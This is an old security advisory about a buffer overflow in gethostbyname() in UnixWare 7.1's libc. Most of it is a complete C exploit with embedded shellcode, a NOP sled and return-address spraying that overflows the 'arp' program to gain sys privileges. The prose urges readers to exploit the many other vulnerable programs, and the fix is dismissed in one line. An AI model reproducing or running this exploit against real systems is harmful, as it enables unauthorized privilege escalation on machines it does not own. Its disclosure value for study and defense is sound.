COMMAND

    gethostbyname()

SYSTEMS AFFECTED

    UnixWare 7

PROBLEM

    Brock Tellier found following.   A serious bug exists in  UnixWare
    7.1's libc.  A buffer  overflow in gethostbyname() will allow  any
    user to obtain elevated privileges.

    Is this  the same  gethostbyname() overflow  which was  present in
    ancient versions of non-unixware libc's way back when?  Can't  say
    for sure, but given SCO's  record of fixing known holes  (remember
    the OpenServer 5 Xtlib  overflows, still present four  years after
    they were known?), who wouldn't doubt it.

    Any program which uses gethostbyname() with user-defined input  is
    vulnerable to a buffer overflow attack.  These overflows come with
    various eases of  exploitability.  Demonstration  program happened
    to be "arp", but any program calling this function will do.   When
    exploiting the dozens of  programs vulnerable to this  hole, don't
    forget  to  check  your  /etc/security/tcb/privs  file  for  other
    non-suid programs which may  allow you to elevate  your privileges
    as well.  See uidadmin  advisory for more info on  UW7's privilege
    system.  Exploit follows.

    /**
     ** UnixWare 7.1 arp exploit yields gid of sys
     ** Demonstrates overflow in uw71's gethostbyname()
     ** use offsets of +-100
     ** Brock Tellier btellier@usa.net
     **
     **/


    #include <stdlib.h>
    #include <stdio.h>

    char scoshell[]=
    "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
    "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
    "\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";


    #define LEN 3500
    #define NOP 0x90

    /* cc != gcc, use hard-coded addresses usually within 0x8045xxxx-0x8048xxxx
    unsigned long get_sp(void) {

    __asm__("movl %esp, %eax");

    }
    */

    int main(int argc, char *argv[]) {

    long int offset=0;

    int i;
    int buflen = LEN;
    long int addr;
    char buf[LEN];

     if(argc > 3) {
      fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
	    exit(0);
     }
     else if (argc == 2){
       offset=atoi(argv[1]);

     }
     else if (argc == 3) {
      offset=atoi(argv[1]);
      buflen=atoi(argv[2]);

     }
     else {
       offset=100;
       buflen=3000;

     }


    addr=0x8046b75 + offset;

    fprintf(stderr, "\nUnixWare 7.1 arp exploit yields uid of sys\n");
    fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
    fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

    memset(buf,NOP,buflen);
    memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
    for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)
	    *(int *)&buf[i]=addr;

    execl("/usr/sbin/arp", "arp", buf,
    NULL);

    exit(0);
    }

SOLUTION

	Fix is out.